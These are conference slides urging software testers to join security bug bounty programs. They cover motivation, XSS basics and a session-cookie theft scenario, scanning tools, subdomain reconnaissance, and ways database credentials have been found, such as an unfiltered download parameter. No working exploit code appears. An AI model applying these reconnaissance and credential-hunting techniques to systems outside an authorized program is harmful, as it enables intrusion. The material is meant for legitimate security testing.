Testers, get into security bug bounties!

by Eusebiu Blindu

CzechTest 2013

I am a tester, not a security expert

http://www.utest.com/

• potential cash

• some reputation

• experience

• skill improvement

• "It's hard and I never did security

stuff before" (psychological)

• "I don't have the skills" (technical)

• "I don't have time, I have to do something else, I can't fit it in my schedule" (logistics)

• you don't have to totally hack exposing a major flaw in order to be rewarded in security bug bounties

• you don't have to know that "much" to get started in sending bug reports

• you don't need to be an expert in the field of security

• Try to find small vulnerabilities

• Try bug bounty programs that don't offer cash, only mentions

• Try to read blog containing reports of already rewarded bugs

• A tester has the reflex of finding and sending general bug reports

• Can send "without shame" a bug report without fear of rejection

• Has a lot of skills that can be focused on security

Reasons:

• it is usually rewarded by every bug bounty program

• most feasible to look for ( considering time spent, chances of finding and the reward value)

• for testers should be easy, because there is not too much new techical knowledge

(for testers to understand)

Simply put: "Make the website popup a window with your desired message on the vulnerable domain by inserting an input"

(but read more about it on the "internets"...)

(... a tester might ask)

• With an XSS you can attack other users (not the server)

• It's one of the most common attacks

1) Attacker sends email with a link to victim

2) Victim clicks on the link

3) Attacker steals session cookie and has access to victim's account

• error pages

• server banner pages

• clickjacking

• payed much more

• harder to find

• requires more "out of the box" thinking

• need little bit of luck

• can be find as a result of one or more low level bug findings

• https://www.site_to_be_tested.com/

• https://www.site_to_be_tested.com/download?filename=D://www_conten

t/reports/12_01_2010.csv

• Main tool should be your brain

• Scanners: Acunetix WVS, Burp Suite Pro, Dirbuster, SqlMap

• Visibility : Fiddler2

• Flash: HP SWFScan

• -... and Google Advanced Search

• it will show you types of bugs on a website that you might not be familiar with

• do a crawling of a website

• do certain activities faster than you

• find occasionally small or medium bugs that are rewardable

• think like a human

• find major flaws

• it will find lots of false positives (fake bugs)

• guarantee a totally safe product

Recommandation:

You can use the tool in the beginning, after you identified an area. Then go try manually with complex steps and deeper investigation.

Battlefield attack

Bug bounty field

Small Plan

Know where you can search for bugs

• more chances to find bugs in newer bug bounty programs

• more chances to find bugs in newly added functionalities

• more chances to find bugs in products that are part of new acquisitions

• you have to be faster especially in the beginning of a new bug bounty program than the competition

• you have to be more creative than the competition to find complex issues

• you can learn from what others already reported before you

• Little bit of healthy competition increases motivation

• the application will seem easier to hack after you saw someone else doing it

• read the requirements and see what is rewardable

• list all the rewardable domains

• list all the rewardable subdomains

(see if Android or iOS platforms are rewardable etc)

• read bug bounty requirements

• read about the product (on main website for example)

• read what was rewarded (social media, blogs, news articles)

• similar domains with the known valid ones

• whois records for domains belonging to the same company

• decrypt data from client app (Desktop,Android,iOS)

• DNS records lookup

• similar IPs (consecutive) as other valid subdomains

• brute force for possible subdomain name "qa.domain.com,db.domain.com"

• Google search: "site:domain.com", "site:domain.com -site:www.domain.com"

• data analysed (image files on main site are listed on a different unknown subdomain)

Just send something!

• tools (helps, but it's not the main thing)

• learning about the business logic and complex functionality helps

• similar bugs in another area could exist

• the same techniques work differently for different people

• hack the database by finding credentials using scanners and manually analyzing files

• hack the database credentials by decompressing a flash file

• hack the database credentials by using an unfiltered download functionality

• keep an open mind (Avoid "I will use only Ubuntu")

• overcome fear of succeeding (subconscious fear of winning, fear or envious reprisals at workplace)

• see more ideas and approaches (social media)

• avoid "expert complex" (fear of trying "stupid" stuff)

• social media can help you

• your personal standards go higher so you aim for higher

• there are not too many testers to promote it

• the current format of bug bounties is new

• seen a as a separate domain

Give a try to security bug bounties

And..

See if it works for you

Thanks!

Eusebiu Blindu

http://www.testalways.com

eusebiu.blindu@testalways.com

@testalways